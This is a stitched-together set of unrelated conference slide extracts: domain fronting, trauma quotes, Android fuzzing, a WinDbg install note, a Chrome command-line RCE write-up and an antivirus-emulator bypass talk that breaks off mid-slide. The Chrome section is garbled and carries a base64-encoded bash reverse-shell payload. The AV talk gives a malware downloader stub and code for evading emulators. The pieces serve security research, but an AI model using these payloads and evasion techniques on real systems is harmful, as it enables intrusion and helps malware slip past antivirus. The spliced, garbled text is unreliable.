Fronting ● Blocking-resistant communication through domain fronting ● Encrypt it or lose it: how encrypted SNI works ● Encrypted Server Name Indication for TLS 1.3 ● Godns - a simple client lib for doing dns over https ● How DNSSEC Works ● SSL Labs - SSL Pulse ● Domain fronting through Cloudflare ● TLS-tris ● RITA (Real Intelligence Threat Analytics) Special Thanks ● Robin Wood (@digininja) - freelance pen-tester, researcher and developer ● Andy Wang (cbeuw) - developer of Cloak ● Nick Sullivan (@grittygrease) - Head of Research and Cryptography at Cloudflare Questions Erik Hunstad Personal Twitter: @badsectorlabs Personal Blog: blog.badsectorlabs.com https://github.com/SixGenInc/Noctilucent
pdf
“Resilience is a form of health.” - Dr. Steve Miles “Grossman!!!” I declare the global social space we are building to be naturally independent of the tyrannies you seek to impose on us. You have no moral right to rule us nor do you possess any methods of enforcement we have true reason to fear. - John Perry Barlow First the explorers, then the pioneers, then the merchants. 
 “And Then the Merchants” from Imaginary Gardens February 26, 1998 One must spend at least a year after the first week in a new culture to learn as much as one did in that first week. That’s how fast we are assimilated. “Human nature is almost unbelievably malleable, responding accurately and contrastingly to contrasting cultural conditions.” Margaret Mead, (Sex and Temperament in Three Primitive Societies (1935) p. 191 “The price one pays for pursuing any profession or calling is an intimate knowledge of its ugly side.” – James Baldwin "Whoever battles monsters should take care not to become a monster too, For if you stare long enough into the Abyss, the Abyss stares also into you." Friedrich Nietzsche, Beyond Good and Evil, chapter 4, no. 146 The illegal drug trade in Haiti involves trans-shipment of cocaine and marijuana to the United States. It is a major shipment route. Haiti in an ideal location for drug smuggling between Colombia and Puerto Rico. Cocaine is also often smuggled directly to Miami in freighters.[ U.S. government agencies estimate that eight percent of the cocaine entering the United States in 2006 transited Haiti or the Dominican Republic. Leading members of the Haitian military, intelligence and police were involved in the illegal drug trade in Haiti. Moral injury refers to an injury to an individual's moral conscience resulting from an act of perceived moral transgression which produces profound emotional shame. The concept of moral injury emphasizes the psychological, cultural, and spiritual aspects of trauma. We are technological somnambulists wandering through an extended dream. We don’t know where we’re going, but we’re on our way. Ethics inside: As former Director of Central Intelligence William Webster once put it, "In the United States, we obey the laws of the United States. Abroad we uphold the national security interests of the United States." https://dl.acm.org/citation.cfm?doid=1536616.1536630 Privacy and security: An ethics code for U.S. intelligence officers supernormals “You will become dead.” The Hero’s Journey. The hero encounters obstacles and barriers. They can outwit them, run away from them, destroy them, or fail. Failure is also honorable. All choices are honorable. When she speaks of “we” there is hope. When we speak of “I” it emphasizes helplessness. We can talk it out or we can act it out. WHAT HELPS? When I go to disaster areas, I decompress on the way out in a non-affected part of the country so that I can see the loveliness of the land and people.  After horrendous times in Indonesia, Bosnia, even Angola, I found that I was restored in the everyday rhthyms of life, coffee shops, a beer at sunset for a couple days. In each place, local detox has helped me see the loveliness of the people and place. A week in a small town with a decent fish market after six weeks with a parade of dump trucks of bodies in Indonesia post tsunami was the last test of a strategy developed over the years.  It sure beats breaking down in an upscale grocery market stateside because I got the cultural bends from ascending too fast from my first experience in a guerrilla war zone on the Thai Cambodian border. == Dr. Steven Miles, author of “Oath Betrayed” and the forthcoming “The Torture Doctors” family friends gardening music yoga meditation physical - strength training, running, martial arts writing about it communities of trust, redemption, transcendence – creation, formation, sustaining a conscience M F A 12 step communities spirituality managing one's ego HIDDEN CREATIVE PROPERTIES "post-traumatic growth." In the face of a major loss, our brains often explore new creative outlets as part of the "rebuilding" process of our lives, 70% of survivors experience some kind of positive psychological change after a traumatic experience. VICTOR FRANKL be mindful and vigilant “I am firmly convinced one cannot do so alone.  One needs trusted companions for sanity. “ COMMUNITY => Mutuality, Feedback, Accountability  Evil against evil => more evil.
pdf
DROID-FF – THE ANDROID FUZZING FRAMEWORK TWITTER : @ANTOJOSEP007 GITHUB : @ANTOJOSEPH @WHOAMI • security engineer @ intel • android security enthusiast • speaker / trainer @ Hitb Amsterdam, brucon / hackinparis / blackhat / nullcon / ground zero / c0c0n … • when not hacking , you can see me travelling / djing / biking DROID-FF : WHY ? • attempts to solve fuzzing in mobile devices (* android ) • challenges in fuzzing : • data – generation • low powered devices • crash logging • crash triage • exploitable or not ? DROID-FF : APPROACH • scripts written in python • integrates with peach / pyzuff / radamsa • custom crash logging • custom crash triaging • exploitable checks via gdb plugin J • Fully automated DROID-FF : DATA GENERATION • two approaches • dump fuzzing using radamsa / pyzuff • generation based fuzzing using peach • to counter checksums / magic numbers , custom fixers are added (for eg : dex repair for fixing checksums in randomly mutated dex files (credits : github.com/anestisb ) • Grammar specified in pit files for peach DROID-FF : FUZZING CAMPAIGN • Runs the generated files against the target binary ( for eg : /system/xbin/dexdump crash1.dex ) • Makes use of adb_android python module to push generated files to device • Makes use of adb shell command to execute the file against the target binary • Adds a custom log to the android logcat so that we can track any files responsible for the crash ( for eg : log -p F -t CRASH_LOGGER SIGSEGV : filename.dex ) DROID-FF : BUILDING ANDROID MODULES • Navigate to the module directory ( eg : /frameworks/av/cmd/stagefright/) • Use the make helper • source build/envsetup.sh • edit (/frameworks/av/cmd/stagefright/Android.mk) and LOCAL_MODULE =$BUILD_EXECUTABLE • mma ( /out/target/product/generic/system/xbin/dexdump) DROID-FF : PROCESSING THE LOGS • Pulls the adb logcat data from the device by saving it to a file and adb pull • Parse the log file and look for crashes ("SIGSEGV", "SIGSEGV", "SIGFPE","SIGILL”) • If a crash is found , go up the lines until you find our custom crash file name logger • Queue the file responsible for the crash to double check DROID-FF : CRASH VERIFICATION • Runs the files responsible for crash against the target binary • In the event of a crash , android system writes tombstone files ( crashdump ) to the /data/tombstones directory . • Backup the tombstone file along with the file responsible for crash • Look for duplicate crashes by filtering the pc register value in the tombstone file and only save unique crashes DROID-FF : PROCESS TOMBSTONES • Unique crashes needs to be mapped to relevant source code • Using ndk-stack and addr2line utilities ( android –ndk tools ) , we map the crash to a line in the android source code • Ndk-stack : • /path/to/file_with_symbols • /path/to/tombstone_file DROID-FF : PROCESS TOMBSTONE (2) • Addr2line • Address of the crash obtained by running ndk-stack in the target module • "-C","-f", "-e", symbols_file_of_crash, address_of_the_crash • Output gives the function and filename responsible for the crash DROIF-FF : EXPLOITABLE ? • Uses a gdb plugin ”exploitable “ which supports arm • Looks at the state of the process when in crashes / unwinds stack etc and predicts based on custom rules • Runs using python gdb api ( (gdb) source ../path/to/exploitable.py) • Gdbserver for arm is pushed to the device DROID-FF : EXPLOITABLE ? (2) • root@goldfish: ./gdbserver :5039 /system/xbin/dexdump crash1.dex • (gdb) set solib-absolute-prefixdb /path/to/symbols/ • (gdb) set solib-search-path /path/to/symbols/system/lib/ • (gdb) target remote : 5039 • (gdb) c • Wait for process to crash or send it a kill sig ( kill -9 pid ) • (gdb) exploitable • (gdb ) Stack Corruption , Exploitable : True , Description : blah blah blah DROID-FF : ACHIEVEMENTS • A lot of crashes , A LOOOOOOOTTTT ! • Fuzzing made easier and available for the masses • Mostly automated • Easily customizable • Python J • Source : github.com/antojoseph/droid-ff DROID-FF : FUTURE IMPROVEMENTS • Integration with ASAN • Add support for automated gdb exploitability test and reporting • Instrumented fuzzing ? • Automate posting of exploitable crashes to android security group ? J AFL FOR ANDROID • Intel open sourced their implementation of afl on android • Responsible for a lot of stagefright crashes • Instrumented fuzzing helps in better coverage of all code paths HONGFUZZ • Runs within android • Ported to android by (github.com/anestisb) • Easy to get up and running with and very useful for quickly fuzzing binaries • Built-in native crash logging mechanism ( over-rides android debuggered ) THANKS • @Ananth Srivastava – for all the packaging and suggestions • @Sumanth Naropanth – for being a cool manager • @jduck – for inspiration to write fuzzers and all the help from droidsec irc ( those series of stagefrights J ) • @anestisb – for those tools and articles on android fuzzing • @Alexandru Blanda – for his work in MFF and being a good friend • @Stephen Kyle - for his articles on fuzzin in ARM • @flanker_hqd– BH Presentation on Fuzzing Parcels HOW TO : DROID-FF HOW TO : DROID-FF : STEP 1 • Python droid-ff.py • Select the data –generator to use • Options ( bitflipper / radamsa / peach ) • On Error : • (make sure you have the python requirements installed) • pyZUFF • adb_android HOW TO : DROID-FF : STEP 2 • To Run the fuzzing campaign : • Have android emulator up and running • Android avd • Start the emulator • Test by checking “adb devices ” in the console • Once running , run droif-ff.py and select option 2 HOW TO : DROID-FF : STEP 3 • Find crashes in your fuzzing campaign • Make sure your emulator is still running and you can connect via adb • Select step 3 in droid-ff.py • This will pull the adb logs and search for any crashes and identify the files responsible • On Error : • Make sure you have all the required directories in the fuzzer folder , else moving files will fail • Manually verify the logcat output and check if the script missed any crashes (very unlikely) HOW TO : DROID-FF : STEP4 • To avoid false positives : • All files which are identified to case a crash in the previous step is run again • If crash happens , a resulting tombstone file is created • We pull the tombstone file and identify the pc address of the crash • We keep a dict of key value pairs of {pc , filename } and unique crashes are identified and moved to a separate folder HOW TO DROID-FF : STEP 5 • The crashes are resolved to a filename and method : • Using ndk-stack tool , binary with symbols and the tombstone file , we can print the stack frame • Using addr2line , address from ndk-stack and binary with symbols , we resolve the crash to a line and method in the sourcode HOW TO : DROID-FF : STEP 6 • Check exploitability : • Uses a gbd plugin which supports linux arm • Loaded via .gdbinit • Set symbol search path in gdb • adb forward tcp:5039 tcp:5039 • gdbserver runs on the android device and listens on tcp port 5039 • gdb connects to gdb server and continues the execution of the binary until fault • On fault signal , run exploitable and prints the result WHAT NEXT ? • Do a second round of manual analysis to make sure the bug is exploitable • Reproduce the bug in different devices / architectures • Report and exhaustive security bug report to the android security team • If you are lucky , get your android – security bounty $$$ THANKS J • Questions please …
pdf
离线安装windbg preview 因为近期的⼀些⼯作问题,⼜重新⽤上了宇宙第⼀调试器 windbg ,但是我是windows server的ECS环境,没法从微软商店安装 windbg preview ,所以只能暂时安装 windbg 。⼈ 都是视觉动物,看着⼿⾥丑陋的 windbg ,我陷⼊了沉思,决定研究⼀下怎么离线安装 wind bg preview 。 下⾯就是我找到的安装⽅法: 找到 windbg preview 的微软商店安装⻚⾯: https://apps.microsoft.com/store/detail/wi ndbg-preview/9PGJGD53TN86?hl=zh-hk&gl=HK 然后将这个URL放在⽹站 https://store.rg-adguard.net/ 上进⾏解析,解析出安装包的地 址: 看到解析出来的 appx 后缀的⽂件就是安装包,copy下载地址后,使⽤powershell进⾏安 装。 接下来就看到已经安装成功,看起来真舒服。 # 下载安装包 PS C:\Users\Administrator\Desktop> Invoke-WebRequest  'http://tlu.dl.delivery.mp.microsoft.com/filestreamings ervice/files/978feae8-9dfb-448a-af1a-f85fa96fd5ab? P1=1658971914&P2=404&P3=2&P4=j21fqtjctMAIZuAGmX1bFOHKmo2 AuSBnK8H4GKqFYqcAHmZ14Y3bpEiKp1FYwXkaAkiz%2fC7TQy2EF6kpY WJuyg%3d%3d'   -OutFile .\windbg.appx ## 安装 Add-AppPackage -Path .\windbg.appx 1 2 3 4 5
pdf
chromemaclinux 0x00 chrome chrome RCE maclinux --gpu-launcher bashshell Windowspoccmd Linux Linuxchrome touchchrometouch bash 0x01 --gpu-launcher chrome --gpu-launcher= --utility-cmd-prefix= --renderer-cmd-prefix= sandbox cc --gpu-launcher ⸺Chromium gpu-launcher renderer-cmd-prefix 1. gpu-launchergpu 2. renderer-cmd-prefix--user-data-dir chrome 1. renderer-cmd-prefix 2. gpu-launcherutility-cmd-prefixrenderer-cmd-prefix 3. gpu-lancher --utility-cmd-prefix gpu macLinuxWindows 0x02 --utility-cmd-prefix payload ls -l /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --no-sandbox --utility-cmd-prefix='ls -l' 1. chromels 2. 3. ls -l ls shell ls -l && pwd ls+bash bash -cbash bash -c 'ls -l' bash -c 'ls' command not found chrome -cbash -c bash -c 'ls'chrome --utility-cmd-prefix+ chrome bash -c "ls -l" bash -c '"ls -l"' '--nosandbox' '--xxxxxx' bash () 0x03 ->-> bash -c "ls -l" ls -l bash -cbash payload bash -c ls&&id //&&shell shell bash -c ls${IFS}-l //shell${IFS} bingobashshell shellubuntu pythonphpsshbashbashshell chromium --no-sandbox --utility-and-browser --utility-cmd-prefix='/bin/sh -c echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xM jcuMC4wLjEvODA4MCAwPiYx|base64${IFS}-d>reverse;bash${IFS}reverse base64bashshell 0x04 argvargv
pdf
Advanced Exploitation Techniques: Breaking AV-Emulator XCon2016/by nEINEI Who is @nEINEI • nEINEI - neineit@gmail.com • Security researcher / software developer /reverse engineer • http://www.vxjump.net • Research interests • Vulnerability, Advanced Exploitation Techniques ,NIPS/HIPS • Complexity Virus/Reverse engineering/Advanced Threat • … Agenda • AV-Emulator Architecture and Implementation • Background • AV-Emulator detection techniques • Advanced Techniques On AV-Emulator Bypass • Process stack information inspection • C++ advanced syntactic features • Randomized conditional branch generation • ROP simulation • DLL forwarding • Exploiting Windows memory heap management • AV-Emulator Bypass Mitigation AV-Emulator Architecture and Implementation • AV-Emulator Background? • Evolved virus polymorphism & metamorphism • Complex PE packers • malicious code behavior analysis Host Decryption Poly Engine Virus RAM Decryption Poly Engine Virus AV-Emulator Architecture and Implementation • If it is an PE unpacker? • AV-Emulator is far beyond a simple instruction simulator, it is currently implemented as a whole package(OS simulation, hardware simulation, etc). AV-Emulator Architecture and Implementation • If it is an PE packer? NO • Intel CPU simulation • Opcode identification • Addressing mode • Instruction analysis system • Hardware simulation(HDD ,memory,NIC…) • Windows OS Simulation • PE loader • Memory management • Task scheduler • API simulating • File system • Registry system • Exception handlers • Thread , process • Debugging system • GUI system • … AV-Emulator Architecture and Implementation • CPU simulation methods • Instruction simulation(used in most AV-emulators) • Instruction translation based on opcode, line-by-line parsing • Inefficiency, monitor each instruction • … • Dynamic translation(QEMU…) • Translate the opcode into intermediate code and interpretive execution • Fast,but the encryption and self-modification of malicious code results in multiple translations • … • Real Environment • Isolated space,malicious code execution in real environment. • Fast, instruction level control is not applicable. • … AV-Emulator Architecture and Implementation • Simulated instruction set • Generic • FPU • 3D Now (Only few) • … • Memory addressing cache • Registration on most recent accessed memory area. • … • CPU exception • TF • Int3 ,int1,int n • Non-existent page • Privileged instruction • Division by 0 exception • Dx register single-step exception • … AV-Emulator Architecture and Implementation • Hardware simulation • Memory, NIC,HDD • Allocate a bunch of memory blocks to simulate Memory, NIC,HDD. • … • PE Loader simulation • PE file mapped to memory. • PEB,TEB • … • API simulation • IAT • Dynamic load • … • Windows GUI • Simple thread scheduler(each thread run a fixed number of instructions, like 100.) • Windows – message notification • … AV-Emulator Architecture and Implementation • More Code-Emulator • Script-Emulator& boot-Emulator by Kaspersky && • At 2016-8,《Detection on SWF vulnerability base on virtual stack machine》 • http://pdfpiw.uspto.gov/.piw?PageNum=0&docid=09396334 • Bitdefender B-HAVE • Virtual Machine for BAT/CMD scripts • VB script emulator • Virtual Machine for executable files (PE, MZ, COM, SYS, Boot Images) • Virtual Machine for VB scripts http://www.bitdefender.com/files/Main/file/BitDefender_Anti virus_Technology.pdf AV-Emulator Architecture and Implementation • How does the AV-Emulator detect packers automatically? • Inspect compiler information. • API instruction sequence • Track critical API call and scan compiler signatures. AV-Emulator Architecture and Implementation • How does the AV-Emulator detect packers automatically? • POP / OR / OR / CALL <sequence identification> 00401E3B | 89 65 E8 | mov dword ptr ss:[ebp-18],esp 00401E3E | 83 65 FC 00 | and dword ptr ss:[ebp-4],0 00401E42 | 6A 01 | push 1 00401E44 | FF 15 CC 41 40 00 | call dword ptr ds:[<__imp____set_app_type>] 00401E4A | 59 | pop ecx 00401E4B | 83 0D F4 32 40 00 FF | or dword ptr ds:[<___onexitend>],FFFFFFFF 00401E52 | 83 0D F8 32 40 00 FF | or dword ptr ds:[<___onexitbegin>],FFFFFFFF 00401E59 | FF 15 C8 41 40 00 | call dword ptr ds:[<__imp____p__fmode>] AV-Emulator Architecture and Implementation • AV-Emulator detection technology? • Critical API call • Malformed PE file • Malware API sequence • API parameters dynamic analysis • Illegal memory access request • Illegal file path request • Illegal registry path request AV-Emulator Architecture and Implementation • AV-Emulator detection technology? • Process creation • Sc service,loading DLL by svchost, CMD ,rundll32/net … • AutoRun • New service,existing service modification • Module load • Load drive,install global hook … • GUI • Hide windows,AV software window handler enumeration… • Network • SPI hook install, HOST file modification… • Cross-process • Read/write other processes AV-Emulator Architecture and Implementation • Registry • IEFO, disable Taskmagr/regedit,IE configuration modification … • Process enumeration • Kill AV software process… • Exception operation • Custom implementation of API feature, ntoskrnl.exe load… • Sensitive behavior • Call int2e/sysenter, bootmgr/ntldr/boot.ini read/write… AV-Emulator Architecture and Implementation • Various ways to bypass AV-Emulator • Timing attack • Huge amount of garbage instruction execution • Parent process detection • Make different conditions • No simulation instruction • Address information leakage • … • All above methods can be patched by AV-Emulator developer in a short time. AV-Emulator Architecture and Implementation What are we going to talk about, with it ? BLACKHAT USA 2016 AVLeak: Fingerprinting Antivirus Emulators for Advanced Malware Evasion https://www.blackhat.com/us-16/briefings.html#avleak-fingerprinting-antivirus- emulators-for-advanced-malware-evasion No,We focus on the weaknesses of AV-Emulator implementation, which is extremely difficult to be fixed in a short period of time. These problems are the real deal to AV-Emulator and it is supposed to let us pay attention. Advanced Exploitation Techniques Simulate basic malware downloader function, complied by FAMS _url db 'http://vxjump.net/mal.exe',0 _mal db ‘c:\\windows\\system32\\mal.exe’,0 virus_run proc invoke URLDownloadToFile, 0, _url, _file, 0, 0 invoke ShellExecute, 0, 0, _mal, 0, 0, SW_SHOW Invoke ExitProcess,0 virus_run end start: call virus_run Process stack information inspection • Inspect at the address 0x10000 • The environment variable information stores at 0x10000 on WinXP, bypass AV- emulator by checking the position of value “00 00 00 00…”. Address Hex dump 00010000 41 00 4C 00 4C 00 55 00 53 00 45 00 52 00 53 00 A.L.L.U.S.E.R.S. 00010010 50 00 52 00 4F 00 46 00 49 00 4C 00 45 00 3D 00 P.R.O.F.I.L.E.=. 00010020 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 C.:.\.D.o.c.u.m. 00010030 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 e.n.t.s. .a.n.d. 1004020 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 .S.e.t.t.i.n.g. 00010760 6E 00 64 00 69 00 72 00 3D 00 43 00 3A 00 5C 00 n.d.i.r.=.C.:.\. 00010770 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 00 00 W.I.N.D.O.W.S... 00010780 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00010790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000107A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000107B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000107C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ char *p = (char*)0x10000; for (int i = 0 ; i < 0xfff;i++){ dwFlag = (DWORD)*(DWORD*)(p+i); if (dwFlag == 0x00000000){ n++; if (n > 30){ break; } } else{ i++; } } Inspect process stack information > WINXP • Fetch the environment variable address of current process by calling GetEnvironmentStrings. • Then search the file path of current executable file,if there is no such information ,the code is running in the AV-Emulator. Address Hex dump 004B1FC8 3D 3A 3A 3D 3A 3A 5C 00 41 4C 4C 55 53 45 52 53 =::=::\.ALLUSERS 004B1FD8 50 52 4F 46 49 4C 45 3D 43 3A 5C 50 72 6F 67 72 PROFILE=C:\Progr 004B1FE8 61 6D 44 61 74 61 00 41 50 50 44 41 54 41 3D 43 amData.APPDATA=C 004B1FF8 3A 5C 55 73 65 72 73 5C 4A 69 66 65 6E 67 5C 41 :\Users\Jifeng\A 004B2008 70 70 44 61 74 61 5C 52 6F 61 6D 69 6E 67 00 43 ppData\Roaming.C 004B2018 4C 41 53 53 50 41 54 48 3D 3B 43 3A 5C 50 72 6F LASSPATH=;C:\Pro 004B2028 67 72 61 6D 20 46 69 6C 65 73 5C 4A 61 76 61 5C gram Files\Java\ 004B2038 6A 64 6B 31 2E 37 2E 30 5F 34 30 5C 6C 69 62 5C jdk1.7.0_40\lib\ Inspect process stack information DWORD min = (DWORD)pEnv; //char* pEnv = GetEnvironmentStrings(); pEnv = 0x004B1FC8 min -= 0x10000; min &= 0xffff0000; search range{min ,(DWORD)pEnv} Address Hex dump 004A59F9 44 3A 5C 5B 52 65 73 65 61 72 63 68 5D 5C 44 65 D:\[Research]\De 004A5A09 65 70 20 52 65 73 65 61 72 63 68 5C 41 64 76 61 ep Research\Adva 004A5A19 6E 63 65 64 20 42 79 70 61 73 73 20 41 56 56 4D nced Bypass AVVM 004A5A29 5C 64 65 6D 6F 5C 62 79 70 61 73 73 5F 6D 6D 78 \demo\bypass_mmx 004A5A39 5F 65 73 65 74 5C 62 79 70 61 73 73 65 73 74 5C _eset\bypassest\ 004A5A49 52 65 6C 65 61 73 65 5C 62 79 70 61 73 73 65 73 Release\bypasses 004A5A59 74 2E 65 78 65 22 00 AB AB AB AB AB AB AB AB 00 t.exe". . 004A5A69 00 00 00 00 00 00 00 FB 1E BA 58 01 C5 00 1C 43 .......?篨?C 004A5A79 00 3A 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 .:.\.W.i.n.d.o.w Advanced Exploitation Techniques • Bypass: • Kaspersky KIS2016 • Norman Suite 11 • Bitdefender Anti-virus2016 • ESET Smart Seurity8 • VBA32 • … • DEMO TIME Unknown MSG • HWND hWnd = CreateWindowEx(NULL, L"button", NULL, WS_OVERLAPPEDWINDOW, 0, 0, 0, 0, NULL, NULL, 0, NULL); • MSG Msg; • GetMessage(&Msg, hWnd, 0,0) • Msg.message = > ?? • If(Msg.message == 0x31f) // first message in the queue • VirusRunning(); // bypass AV-Emulator Unknown MSG • HWND hWnd = CreateWindowEx(NULL, L"button", NULL, WS_OVERLAPPEDWINDOW, 0, 0, 0, 0, NULL, NULL, 0, NULL); • CreateCaret(hWnd,0,0,0); • or • Flashwindow(hWnd,true); • MSG Msg; • GetMessage(&Msg, hWnd, 0,0) • Msg.message = > ?? • If(Msg.message == 0x118) // process a WM_SYSTEMTIMER message • VirusRunning(); // bypass AV-Emulator Advanced Exploitation Techniques • C++ provides friend class • It provides variable access protection on compiler level • It makes the process of object construction complicated and hard for AV- Emulator to simulate on the binary level class CExploitA : public CInterface { public: int m_pointer; friend class CExploitB; private: PROC m_caller; PROC Change() { m_caller = (PROC)m_pointer; return m_caller; } }; Exploiting C++ advanced syntactic features • It provides variable access protection on compiler level • It makes the process of object construction complicated and hard for AV- Emulator to simulate on the binary level class CExploitB : public CInterface { public: int m_pointer; virtual int GetPointer() { return m_pointer; } int CallRunVirus(CExploitA &A) { PROC call = A.Change(); call(); return TRUE; } } Void Test_VM() { CExploitA *a = new CExploitA; a->SetPointer((int)(PROC)VirusRunning); CExploitB *b = new CExploitB; b->CallRunVirus(*a); //the virus code will be running } Exploiting C++ advanced syntactic features • It provides variable access protection on compiler level • It makes the process of object construction complicated and hard for AV- Emulator to simulate on the binary level v2 = operator new(0x14u); if ( v2 ) { *((_DWORD *)v2 + 1) = -1718123434; *((_DWORD *)v2 + 2) = 0x7FFFFFFF; *((_DWORD *)v2 + 4) = 0; *(_DWORD *)v2 = &CExploitB::`vftable'; } (*(void (__thiscall **)(void *, void (__cdecl *)()))(*(_DWORD *)v1 + 8))(v1, VirusRunning); v3 = (void (*)(void))*((_DWORD *)v1 + 2); *((_DWORD *)v1 + 5) = v3; v3(); return 1; Exploiting C++ advanced syntactic features Bypass • Norman Suite 11 • Bitdefender Anti-virus2016 • ESET Smart Seurity8 • VBA32 • … Essentially, any of advanced semantic feature have abilities to negatively affect AV-Emulator technology, such as smart pointer, C++ exception ... DEMO TIME Exploiting C++ advanced syntactic features 1. Class object stores in smart pointer. 2. The object’s destructor would be called when the lifecycle of smart pointer ends. 3. Malicious function would be called within the object’s destructor. Void TestVM(){ shared_ptr <CExploitC> myptr(new CExploitC); myptr->SetPointer((int)(PROC)VirusRunning); return ; } class CExploitC : public CInterface{ public: CExploitC::~CExploitC() { m_call();} virtual int SetPointer(int pointer){ m_call = (PROC)pointer; return m_pointer;} }; Exploiting C++ advanced syntactic features Using a smart pointer lifecycle to execute malicious functions when destructor releases resources Bypass Kaspersky KIS2016 { .. LOBYTE(v11) = 2; a[0] = 0; a[1] = 0; *(_DWORD *)std::shared_ptr<CExploitC>::operator->(&myptr)->m_pointer = 0; v3 = 1; v11 = -1; std::shared_ptr<CExploitC>::~shared_ptr<CExploitC>(&myptr); return v3;} Advanced Exploitation Techniques 1) Randomized conditional branch generation could possibly trap the AV-Emulator into false branch, therefore no malicious behavior is triggered. We need to search specific APIs which return random values, such as BOOL WINAPI FindFirstFreeAce( _In_ PACL pAcl, // When invoked ,the pAc will be modified _Out_ LPVOID *pAce ); UINT WINAPI MapVirtualKey( //When invoked ,will return a value which is random integer _In_ UINT uCode, _In_ UINT uMapType); Randomized Conditional Branch 2)We write a custom function and make the stack unbalanced on purpose. 3)The combination of unbalanced stack and crafted conditional branch would make AV-Emulator jump into a branch which no malicious is triggered. We need to search specific APIs which return random values, such as BOOL WINAPI FindFirstFreeAce( _In_ PACL pAcl, // The pAc would be modified after invoked _Out_ LPVOID *pAce ); UINT WINAPI MapVirtualKey( // This API returns a random value. _In_ UINT uCode, _In_ UINT uMapType); Randomized Conditional Branch Randomized conditional branch generation could possibly trap the AV_Emulator into false branch, therefore no malicious behavior is triggered. fake_call_A proc … call MapVirtualKey cmp eax,10h jg @f pop eax pop ebx ret @@: ret fake_call_B proc call FindFirstFreeAce mov eax,offset out_p1 mov ebx,[eax] cmp eax,ebx jl @f pop eax pop ebx ret @@: ret main proc call fake_call_X End main Fake_call_x proc ... Fake_call_A End fake_call_X Randomized Conditional Branch bypass • Kaspersky <= KIS2012 • Norman Suite 11 • Bitdefender Anti-virus2016 • ESET Smart Seurity8 • VBA32 • … <= Kaspersky KIS2012 , cannot bypass Kaspersky later version, the KIS simulate the situation that two branches are both true. Randomized Conditional Branch Custom craft of stack parameter, push encrypted address of function VirusRunning CustomerFun() { … push VirusRunning call API ret } TestVM() { call CustomerFunc } Paramer 1 Paramer 2 Paramer 3 VirusRunning Paramer …n API_ret_addr Randomized Conditional Branch VirusRunning = VirusRunning xor 0xfffffff8 ;encryption of address Mov eax,VirusRunning Xor eax,0xfffffff8 Push eax // push a encrypted of address Xor eax,0xfffffff8 Mov [esp],eax ret // the virus code will control execution flow again. Randomized Conditional Branch Bypass • >=Kaspersky KIS2013 • Norman Suite 11 • Bitdefender Anti-virus2016 • ESET Smart Seurity8 • VBA32 • … DEMO TIME Advanced Exploitation Techniques Run malicious core code by using the tech like ROP Gadget 1) The AV-Emulator simulates APIs 2) Typically, the underlying DLL module like Ntdll doesn’t have to be simulated. Such as Kernel32.CreateFile --- > ntdll.NtCreateFile 3) Ntdll module is not loaded into simulate environment of AV-Emulator 4) The AV-Emulator is not able to detect the malicious function which is called from the ‘ret’ instruction within Ntdll module. Simulate ROP ways to execute core code Simulate ROP ways to execute core code - windows 7 X86 SP1 EOP: EAX 75443368 kernel32.BaseThreadInitThunk ECX 00000000 EDX 004014AA bypasses.<ModuleEntryPoint> EBX 7EFDE000 ESP 0018FF8C ASCII "z3Du" EBP 0018FF94 ESI 00000000 EDI 00000000 EIP 004014AA bypasses.<ModuleEntryPoint> 1)Acquire kernel32 module base address by accessing EAX 2)Search a statement from kernel32 module, which can be used to call Ntdll. 77E15947 FF15 8412DE77 CALL DWORD PTR DS:[<&ntdll. NtQueryInformationToken>; 77E1594D 3BC3 CMP EAX,EBX Simulate ROP ways to execute core code Simulate ROP ways to execute core code - windows 7 X86 SP1 EOP: EAX 75443368 kernel32.BaseThreadInitThunk ECX 00000000 EDX 004014AA bypasses.<ModuleEntryPoint> EBX 7EFDE000 ESP 0018FF8C ASCII "z3Du" EBP 0018FF94 ESI 00000000 EDI 00000000 EIP 004014AA bypasses.<ModuleEntryPoint> 3)Calculate base address of Ntdll module by using QueryInformationToken address 4) Push the address of function VirusRunning onto stack. add edx,0x29e push VirusRunning push edi push esi push ebx jmp edx // jump a gadget Simulate ROP ways to execute core code Simulate ROP ways to execute core code - windows 7 X86 SP1 EOP: EAX 75443368 kernel32.BaseThreadInitThunk ECX 00000000 EDX 004014AA bypasses.<ModuleEntryPoint> EBX 7EFDE000 ESP 0018FF8C ASCII "z3Du" EBP 0018FF94 ESI 00000000 EDI 00000000 EIP 004014AA bypasses.<ModuleEntryPoint> 5) ;jump to ntdll gadget ;.text:77EC96C5 pop edi ;.text:77EC96C6 pop esi ;.text:77EC96C7 mov eax, ebx ;.text:77EC96C9 pop ebx ;.text:77EC96CA retn Simulate ROP ways to execute core code Bypass • Kaspersky KIS2016 • Norman Suite 11 • Bitdefender Anti-virus2016 • ESET Smart Seurity8 • VBA32 • … As long as we can find a module which can not be loaded by AV- Emulator. It can be leveraged to bypass AV-Emulators. DEMO TIME Advanced Exploitation Techniques • DLL forwarding • It is hard for AV-Emulator to do DLL forwarding because AV-Emulator typically scans import table or dynamically loads API to determine if an API can be called. • For now, the AV-Emulator is still not able to simulate indirect DLL forwarding. Exploiting DLL Forwarding • How to build a call? URLDownloadToFile 1. We need to find a particular API which is not reported as risk by AV-Emulator. 2. The API from phase #1 can load URLMon.DLL indirectly. • API HrSniffUrlForRfc822 meets the above requirement. Exploiting DLL Forwarding signed int __stdcall HrSniffUrlForRfc822(LPCWSTR ppwzMimeOut) { signed int v1; // edi@1 v1 = 1; if ( FindMimeFromData(0, ppwzMimeOut, 0, 0, 0, 0, (LPWSTR *)&ppwzMimeOut, 0) >= 0 ) { if ( !StrCmpW(ppwzMimeOut, L"message/rfc822") ) v1 = 0; CoTaskMemFree((LPVOID)ppwzMimeOut); } return v1; } Exploiting DLL Forwarding __stdcall CBody::Load(int, struct IMoniker *, struct IBindCtx *, unsigned long) -> HrSniffUrlForRfc822(LPCWSTR ppwzMimeOut) -> 